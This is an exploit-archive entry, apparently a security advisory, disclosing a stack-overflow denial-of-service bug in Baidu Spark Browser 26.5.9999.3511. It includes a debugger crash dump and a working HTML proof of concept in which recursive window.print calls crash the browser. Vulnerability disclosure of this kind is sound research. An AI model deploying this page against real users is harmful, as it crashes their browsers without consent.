Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)

2014-07-04T00:00:00
ID 1337DAY-ID-22402
Type zdt
Reporter LiquidWorm
Modified 2014-07-04T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            <!--
 
Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)
 
 
Vendor: Baidu, Inc.
Product web page: http://www.baidu.com
Affected version: 26.5.9999.3511
 
Summary: Spark Browser is a free Internet browser with very
sharp UIs and cool utilities. It's based on the Chromium
technology platform, giving it fast browsing capabilities.
 
Desc: Spark Browser version 26.5.9999.3511 allows remote
attackers to cause a denial of service (application crash)
resulting in stack overflow via nested calls to the window.print
javascript function.
 
-----------------------------------------------------------------
 
(153c.14f4): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010c
eip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
ntdll!memcpy+0xbb8f:
77e0decf 56              push    esi
 
-----------------------------------------------------------------
 
Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
 
Advisory ID: ZSL-2014-5190
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php
 
 
28.06.2014
 
-->
 
 
<html>
<title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>
<body bgcolor="#50708C">
<center>
<p><font color="#e3e3e3">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>
<button onClick=crash()>Execute!</button>
</center>
<script>
function crash(){
    window.print();
    crash();
}
</script>
</body>
</html>

#  0day.today [2018-01-02]  #